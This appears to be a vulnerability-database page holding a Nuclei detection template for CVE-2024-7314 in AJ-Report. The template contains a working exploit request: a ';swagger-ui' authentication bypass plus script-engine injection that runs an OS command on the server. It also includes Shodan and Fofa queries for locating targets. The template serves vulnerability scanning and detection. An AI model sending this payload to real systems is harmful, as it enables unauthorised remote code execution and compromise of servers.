| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-7314 | 2 Aug 202419:52 | – | circl | |
| AJ-Report 安全漏洞 | 2 Aug 202400:00 | – | cnnvd | |
| CVE-2024-7314 | 2 Aug 202416:33 | – | cve | |
| CVE-2024-7314 anji-plus AJ-Report Authentication Bypass | 2 Aug 202416:33 | – | cvelist | |
| CVE-2024-7314 | 2 Aug 202417:16 | – | nvd | |
| CVE-2024-7314 | 2 Aug 202417:16 | – | osv | |
| PT-2024-38260 · Anji Plus · Anji-Plus Aj-Report | 2 Aug 202400:00 | – | ptsecurity | |
| CVE-2024-7314 | 5 Feb 202512:00 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-7314 | 27 May 202500:00 | – | vulncheck_kev | |
| CVE-2024-7314 anji-plus AJ-Report Authentication Bypass | 2 Aug 202416:33 | – | vulnrichment |
id: CVE-2024-7314
info:
name: AJ-Report < 1.4.1 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
impact: |
Unauthenticated attackers can bypass authentication and execute arbitrary Java code on the server through script engine injection, achieving complete system compromise and access to all application data.
remediation: |
Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
reference:
- https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
- https://github.com/yuebusao/AJ-REPORT-EXPLOIT
- https://xz.aliyun.com/t/14460
- https://nvd.nist.gov/vuln/detail/CVE-2024-7314
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-280
epss-score: 0.51468
epss-percentile: 0.98807
cve-id: CVE-2024-7314
cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: anji-plus
product: report
fofa-query: app="AJ-Report"
shodan-query: http.title:"AJ-Report"
tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln
http:
- raw:
- |
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- 'data":'
condition: and
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a00483046022100dafcb1653ae9106cfa03f311490a10b44ff13dde20e7dc9094590d2913629588022100d2fc03c36242e5930b8af9d35ff532d0e415f2900042c47eaa3b93f7d86cc727:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation